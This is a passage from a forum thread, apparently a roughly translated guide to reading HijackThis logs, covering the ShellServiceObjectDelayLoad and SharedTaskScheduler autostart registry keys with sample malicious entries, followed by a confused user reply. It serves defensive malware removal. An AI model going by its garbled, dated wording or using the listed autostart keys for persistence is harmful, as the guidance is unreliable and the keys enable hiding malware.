    There are very few legitimate programs that use this registry key, but you must proceed with caution when deciding to delete the files that are listed here. Use Google or a list (List of Startups Bleeping Computer) as a support to investigate whether the files are legitimate or not.

    When you fix these entries with HijackThis, HijackThis will want to delete the file list. Sometimes the file may be in use. Yes, the file still is not removed, you must enter in safe mode and remove it manually.
    ____________________________________________________________________________________________________ ____________________

    Group O21.
    This group is for files that are loaded through the ShellServiceObjectDelayLoad registry key.

    This key contains values similar to the Run registry key. The difference is that instead of pointing to the same file, it points to the CLSID InProcServer, which contains information about the particular DLL that is being used.

    Files under this key are loaded automatically by Explorer.exe when your computer starts. Because Explorer.exe is the shell for your computer, it always will be loaded, so loading the files under this key. These files are therefore loaded early in the startup process that occurs before any human intervention.

    A hijacker who uses the method can be recognized by the following entries:

    Code:
    Sample List: R0 - HKCU\Software\Microsoft\Internet Explorer\Main, Start Page = C:\WINDOWS\secure.html 
    R1 - HKCU\Software\Microsoft\Internet Explorer\Main, Default_Page_URL=C:\WINDOWS\secure.html
    Code:
    Registry key: HKEY_LOCAL_MACHINE \ Software \ Microsoft \ Windows \ CurrentVersion \ ShellServiceObjectDelayLoad
    Code:
    Sample List O21 - SSODL: System - - C: \ WINDOWS \ system32 \ system32.dll
    HijackThis is an internal database that recognizes the legitimate uses and not in the log list, So, you see any entry O21 and may consider suspicious.
    You can use Google to check on this DLL or DLL's from this list:
    List of DLL's group O21 of Bleeping Computer.

    When you fix these entries with HijackThis, HijackThis will want to delete the file list. Sometimes the file may be in use. Yes, the file still is not removed, you must enter in safe mode and remove it manually.
    ____________________________________________________________________________________________________ ____________________

    Group O22.
    This group is for files that are loaded through the SharedTaskScheduler registry value.
    Entries in this registry run automatically when Windows starts. To date only CWS.Smartfinder using this key.

    Registration Key:
    Code:
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SharedTaskScheduler
    Code:
    Sample List O22 - SharedTaskScheduler: (no name) - - c:\windows\system32\mtwirl32.dll
    HijackThis deletes the value associated with this SharedTaskScheduler's entry, but not erase that it points to the CLSID or the file that points to the CLSID InprocServer32. Therefore, as in previous groups, we must enter in safe mode and delete it manually using Unlocker or other similar program.

    Here ends the manual, I hope that fits all.

    Any suggestion is more than welcome!.

  8. #8
    Join Date
    Dec 2008
    Location
    Colombo
    Posts
    121

    Re: How to read a HijackThis log?

    is this hijack is successful? STILL i cant read hijack reports. Another question how small file scan machine? Please Explain

Similar Threads

  1. What to Delete from Hijackthis log
    By xxashxx87 in forum Windows Software
    Replies: 3
    Last Post: 21-06-2010, 11:23 PM
  2. Hijackthis is not running
    By Galbraith in forum Networking & Security
    Replies: 4
    Last Post: 30-03-2010, 12:18 AM
  3. Hijackthis help
    By Kasidhna in forum Windows Software
    Replies: 1
    Last Post: 24-06-2009, 08:22 AM
  4. HijackThis - How to use HijackThis? What it dose?
    By Florence in forum Guides & Tutorials
    Replies: 2
    Last Post: 29-08-2008, 05:58 PM
  5. What is HijackThis?
    By MandarM in forum Windows Software
    Replies: 3
    Last Post: 29-08-2008, 05:44 PM

Tags for this Thread

Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •  
Page generated in 1,711,716,058.71101 seconds with 17 queries